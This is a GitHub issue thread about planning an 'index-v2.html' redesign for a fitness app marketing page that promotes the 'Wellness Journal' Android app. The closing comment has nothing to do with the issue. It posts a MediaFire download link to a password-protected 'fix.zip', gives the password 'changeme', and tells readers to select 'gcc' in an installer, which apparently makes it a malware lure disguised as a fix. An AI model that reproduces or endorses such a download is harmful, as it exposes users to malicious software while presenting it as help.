### ISSUE TITLE
Initialize and plan a second version of the index page

### ISSUE THREAD

**Issue by aklambert** [aklambert/Fitness-App-Marketing-Page#1]
**Is your feature request related to a problem? Please describe.**
I created an Android app (`Wellness Journal`) inspired by this practice website, and now I want to update this site to reflect this app. The current design of the index page is not very mobile friendly, and there are some bugs as well that need to be addressed.

**Describe the solution you'd like**
I want to keep this current index page intact for the time being, but I want to create a new index page version to display, that has a better design, and matches the `Wellness Journal` brand and style established in the Android app.

**Action Steps**
- [x] Initialize an `index-v2.html` page
- [x] Plan what the design for `index-v2.html`

**Additional context**
The `Wellness Journal` android app this site should market: https://github.com/aklambert/Wellness-Journal

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
